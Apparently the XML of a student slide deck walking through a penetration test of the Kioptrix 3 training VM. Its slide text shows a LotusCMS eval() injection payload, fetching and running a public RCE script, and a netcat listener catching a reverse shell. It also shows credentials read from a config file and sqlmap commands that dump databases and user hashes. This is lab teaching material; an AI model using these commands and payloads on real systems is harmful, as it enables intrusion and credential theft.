            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5420212" h="1041641" extrusionOk="0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1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9651087" y="3765838"/>
            <a:ext cx="5976140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Mohammed Samir</a:t>
            </a:r>
            <a:endParaRPr sz="36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9183742" y="5139919"/>
            <a:ext cx="7000610" cy="1345357"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5420212" h="1041641" extrusionOk="0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1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9651087" y="5511607"/>
            <a:ext cx="5976140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Youssef Rushdy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9183742" y="6885688"/>
            <a:ext cx="7000610" cy="1345357"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5420212" h="1041641" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="5295752" y="1041640"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="124460" y="1041640"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="55880" y="1041640"/>
                  <a:pt x="0" y="985761"/>
                  <a:pt x="0" y="9171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917181"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5420212" y="985761"/>
                  <a:pt x="5364332" y="1041641"/>
                  <a:pt x="5295752" y="10416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9651087" y="7257376"/>
            <a:ext cx="5976140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Mohammed Ameen</a:t>
            </a:r>
            <a:endParaRPr sz="36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44" name="Google Shape;444;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3712371" y="545687"/>
            <a:ext cx="10863257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Exploitation</a:t>
            </a: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304800" y="2857500"/>
            <a:ext cx="7327265" cy="123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 used burpsuit to try this command and see the result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page=index');${print("testing this")};#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46" name="Google Shape;44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3695700"/>
            <a:ext cx="10930255" cy="567118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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="7124700"/>
            <a:ext cx="5345430" cy="206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It’s working we print “testing this ” here we go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We will use another command to have shell on the machine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8" name="Google Shape;448;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11353800" y="8801100"/>
            <a:ext cx="1676400" cy="228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54" name="Google Shape;454;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3712371" y="545687"/>
            <a:ext cx="10863257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Exploitation</a:t>
            </a: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228600" y="2095500"/>
            <a:ext cx="7327265" cy="6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Create listener on port 1234 rlwrap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56" name="Google Shape;45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4252" y="3022378"/>
            <a:ext cx="12654280" cy="694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62" name="Google Shape;462;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3712371" y="545687"/>
            <a:ext cx="10863257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Exploitation</a:t>
            </a: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3" name="Google Shape;463;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2095500"/>
            <a:ext cx="7327265" cy="6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Create listener on port 1234 rlwrap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4" name="Google Shape;46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6200" y="3086100"/>
            <a:ext cx="12654280" cy="694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78" name="Google Shape;378;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="4491990"/>
            <a:ext cx="16230600" cy="137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ANOTHER WAY</a:t>
            </a:r>
            <a:endParaRPr sz="9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06" name="Google Shape;406;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="3237607"/>
            <a:ext cx="11301259" cy="1977720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11301259" h="1977720" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11301259" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11301259" y="1977720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1977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07" name="Google Shape;407;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7649288" y="5905500"/>
            <a:ext cx="8292943" cy="2519586"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8292943" h="2519586" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8292943" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8292943" y="2519586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2519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08" name="Google Shape;408;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3712371" y="400050"/>
            <a:ext cx="10863257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Exploitation</a:t>
            </a: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318487" y="2181896"/>
            <a:ext cx="14257141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wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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htps://raw.githubusercontent.com/Hood3dRob1n/LotusCMSExploit/master/lotusRCE.sh</a:t>
            </a:r>
            <a:endParaRPr sz="3200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932499" y="6134100"/>
            <a:ext cx="5559743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hange the permission and run the script </a:t>
            </a:r>
            <a:endParaRPr sz="3200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chmod 777 lotusRCE.sh./lotusRCE.sh I got </a:t>
            </a:r>
            <a:endParaRPr sz="3200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the usage. </a:t>
            </a:r>
            <a:endParaRPr sz="3200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16" name="Google Shape;416;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7122913" y="2601184"/>
            <a:ext cx="10021599" cy="3294562"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10021599" h="3294562" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10021599" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10021599" y="3294562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3294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17" name="Google Shape;417;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7122913" y="6262130"/>
            <a:ext cx="10021599" cy="2240863"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10021599" h="2240863" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10021599" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10021599" y="2240863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="22408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1222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18" name="Google Shape;418;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3712371" y="613813"/>
            <a:ext cx="10863257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Exploitation</a:t>
            </a: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1229438" y="2814333"/>
            <a:ext cx="5893475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Run the script again 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./lotusRCE.sh kioptrix3.com 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Before supplying an IP, I need reverse shell. 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2251947" y="6199556"/>
            <a:ext cx="3848457" cy="11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Create listener on port 1234</a:t>
            </a:r>
            <a:endParaRPr sz="3200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rlwrap nc -lvp 1234</a:t>
            </a:r>
            <a:endParaRPr sz="3200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95" name="Google Shape;395;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6818739" y="3015190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 extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11301259" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11301259" y="1426784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1426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96" name="Google Shape;396;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3712371" y="545687"/>
            <a:ext cx="10863257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Exploitation</a:t>
            </a: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7" name="Google Shape;397;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="597232" y="2837042"/>
            <a:ext cx="5624275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Search for exploit scripts searchsploit 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lotuscms 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There’s a script, but it’s metasploit script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6221507" y="5237736"/>
            <a:ext cx="5259348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Afer googling, I came across this script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4155862" y="6581071"/>
            <a:ext cx="965835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Hood3dRob1n/LotusCMS-Exploit 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LotusCMS 3.0 eval() Remote Command Executon. Contribute to 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Hood3dRob1n/LotusCMS-Exploit development by creatng an… github.com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8141956" y="9236365"/>
            <a:ext cx="168616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Download it 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26" name="Google Shape;426;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7938708" y="2044958"/>
            <a:ext cx="7810004" cy="2346767"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7810004" h="2346767" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7810004" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7810004" y="2346768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2346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0175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27" name="Google Shape;427;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1717658" y="6878143"/>
            <a:ext cx="4406210" cy="3028206"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4406210" h="3028206" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4406209" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4406209" y="3028206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30282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28" name="Google Shape;428;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9381682" y="6738583"/>
            <a:ext cx="5920630" cy="3307327"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5920630" h="3307327" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5920630" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5920630" y="3307327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="330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29" name="Google Shape;429;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3712371" y="400050"/>
            <a:ext cx="10863257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Exploitation</a:t>
            </a:r>
            <a:endParaRPr sz="8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1880611" y="1953784"/>
            <a:ext cx="4556758" cy="358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99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1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1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Supplying input</a:t>
            </a:r>
            <a:endParaRPr sz="311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1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IP: 10.0.2.24 (attacker ip)PORT : 1234</a:t>
            </a:r>
            <a:endParaRPr sz="311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1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1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endParaRPr sz="311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1" name="Google Shape;431;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2041848" y="4348862"/>
            <a:ext cx="3663521" cy="335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982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4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8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4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 select first netcat command</a:t>
            </a:r>
            <a:endParaRPr sz="294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8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4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#? 1</a:t>
            </a:r>
            <a:endParaRPr sz="294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82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4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82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4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8130200" y="4391725"/>
            <a:ext cx="8423593" cy="232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6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Back to listener, now I have a shell. Type some command to verify</a:t>
            </a:r>
            <a:endParaRPr sz="306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ls</a:t>
            </a:r>
            <a:endParaRPr sz="306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511" name="Google Shape;511;p45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144000" y="1638300"/>
            <a:ext cx="8915400" cy="4268868"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7110715" h="4268868" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7110715" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7110715" y="4268868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="42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512" name="Google Shape;512;p45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144000" y="6706113"/>
            <a:ext cx="8915400" cy="2302632"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11301259" h="2302632" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11301258" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11301258" y="2302632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2302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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724400" y="342900"/>
            <a:ext cx="10293350" cy="123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Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr sz="8000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4" name="Google Shape;514;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2450911" y="7274499"/>
            <a:ext cx="315432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 found it on gconfig.php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977241" y="2874901"/>
            <a:ext cx="7189518" cy="11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Normally, CMS has config file containing username and password for SQL connection and I have to find it.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521" name="Google Shape;521;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7495828" y="3514079"/>
            <a:ext cx="9281310" cy="1629421"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9281310" h="1629421" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9281310" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9281310" y="1629421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1629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522" name="Google Shape;522;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4538027" y="279712"/>
            <a:ext cx="921194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8000" dirty="0">
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:rPr>
              <a:t>Finding Credentials</a:t>
            </a:r>
            <a:endParaRPr sz="8000" u="none" strike="noStrik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3" name="Google Shape;523;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2425250" y="3460756"/>
            <a:ext cx="3315295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cat gconfig.php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4" name="Google Shape;524;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="3960495"/>
            <a:ext cx="6214706" cy="11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Now I have username and password for mysql.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5" name="Google Shape;525;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5029200" y="7658100"/>
            <a:ext cx="7769781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remeber when we do nikto scan we found  some pages like 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6" name="Google Shape;526;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3277453" y="8657579"/>
            <a:ext cx="12265392" cy="7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http://kioptrix3.com/phpmyadmin/index.php</a:t>
            </a:r>
            <a:endParaRPr sz="4600" u="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arimo"/>
              <a:ea typeface="Arimo"/>
              <a:cs typeface="Arimo"/>
              <a:sym typeface="Arimo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07" name="Google Shape;107;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="655757" y="950454"/>
            <a:ext cx="10611580" cy="155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E5E5E5"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:rPr>
              <a:t>Table of Contents</a:t>
            </a:r>
            <a:endParaRPr sz="9000" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="E5E5E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9295106" y="3244114"/>
            <a:ext cx="3944463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E5E5E5"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr sz="4200" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="E5E5E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7879289" y="3236448"/>
            <a:ext cx="771999" cy="7719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7992682" y="3226017"/>
            <a:ext cx="545211" cy="6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6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7879289" y="4516288"/>
            <a:ext cx="771999" cy="7719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7992682" y="4505857"/>
            <a:ext cx="545211" cy="6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6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9295106" y="5823798"/>
            <a:ext cx="7322748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E5E5E5"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:rPr>
              <a:t>Post-Exploitation</a:t>
            </a:r>
            <a:endParaRPr sz="4200" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="E5E5E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7879289" y="7075970"/>
            <a:ext cx="771999" cy="7719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7992682" y="7065538"/>
            <a:ext cx="545211" cy="6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6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9234835" y="4543957"/>
            <a:ext cx="7322748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E5E5E5"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:rPr>
              <a:t>Methodology</a:t>
            </a:r>
            <a:endParaRPr sz="4200" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="E5E5E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7879289" y="5796129"/>
            <a:ext cx="771999" cy="7719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7992682" y="5785698"/>
            <a:ext cx="545211" cy="6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6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9295106" y="7058109"/>
            <a:ext cx="7322748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E5E5E5"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:rPr>
              <a:t>RECOMMENDATION</a:t>
            </a:r>
            <a:endParaRPr sz="4200" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="E5E5E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532" name="Google Shape;532;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="3830381"/>
            <a:ext cx="5810455" cy="4711715"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5810455" h="4711715" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5810456" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5810456" y="4711715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4711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533" name="Google Shape;533;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7467600" y="3883969"/>
            <a:ext cx="10143108" cy="4986681"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10143108" h="4986681" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10143108" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10143108" y="4986680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4986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11416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534" name="Google Shape;534;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5511165" y="400050"/>
            <a:ext cx="7916545" cy="123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Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr sz="8000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5" name="Google Shape;535;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1677853" y="3080302"/>
            <a:ext cx="3094054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login into the page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6" name="Google Shape;536;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144000" y="2781300"/>
            <a:ext cx="6851021" cy="154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1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Accessing database: gallery and table: dev_accounts. I have hashes of these users, dreg and loneferret.</a:t>
            </a:r>
            <a:endParaRPr sz="277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18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7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41" name="Google Shape;241;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551814" y="1965021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 extrusionOk="0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42" name="Google Shape;242;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551814" y="942975"/>
            <a:ext cx="10611580" cy="293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We make sure if there is sql injecton by adding  ‘  to url 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3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3" name="Google Shape;243;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12044601" y="5817886"/>
            <a:ext cx="5910501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there is sql injecton already exist</a:t>
            </a:r>
            <a:endParaRPr sz="4000" u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12044601" y="4756150"/>
            <a:ext cx="3663434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 got a SQL error back</a:t>
            </a:r>
            <a:endParaRPr sz="4000" u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50" name="Google Shape;250;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13529441" y="5406672"/>
            <a:ext cx="5309822" cy="5648746"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5309822" h="5648746" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5309822" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5309822" y="5648746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5648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51" name="Google Shape;251;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454837" y="2710057"/>
            <a:ext cx="17378325" cy="2635120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17378325" h="2635120" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17378326" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17378326" y="2635120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2635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638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52" name="Google Shape;252;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4451349" y="7136756"/>
            <a:ext cx="7365184" cy="2701515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7365184" h="2701515" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7365184" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7365184" y="2701515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2701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53" name="Google Shape;253;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="469900"/>
            <a:ext cx="10611580" cy="155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USING SQLMAP</a:t>
            </a:r>
            <a:endParaRPr sz="9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4" name="Google Shape;254;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4451349" y="2155820"/>
            <a:ext cx="10611580" cy="43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sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1%27&amp;sort=photoid#photos" -p id --dbs       </a:t>
            </a:r>
            <a:endParaRPr sz="25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1766872" y="5459491"/>
            <a:ext cx="1470707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So there’s an injection vulnerability. AND I get some database names AND I WANT TO GET SOME TABLE NAMES.</a:t>
            </a:r>
            <a:endParaRPr sz="3200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6" name="Google Shape;256;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1332470" y="6280042"/>
            <a:ext cx="1562305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sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" u="none" strike="noStrike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 -u "http://kioptrix3.com/gallery/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" u="none" strike="noStrike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gallery.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" u="none" strike="noStrike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=1%27&amp;sort=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" u="none" strike="noStrike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photoid#photos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" u="none" strike="noStrike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" -p id -D gallery --tables</a:t>
            </a:r>
            <a:endParaRPr sz="3200" u="none" strike="noStrike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7" name="Google Shape;257;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4624388" y="7710783"/>
            <a:ext cx="1864995" cy="589843"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2486660" h="795020" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="2391410" y="381000"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1906270" y="317500"/>
                  <a:pt x="1804670" y="267970"/>
                  <a:pt x="1728470" y="247650"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1677670" y="233680"/>
                  <a:pt x="1638300" y="234950"/>
                  <a:pt x="1598930" y="220980"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1564640" y="208280"/>
                  <a:pt x="1549400" y="180340"/>
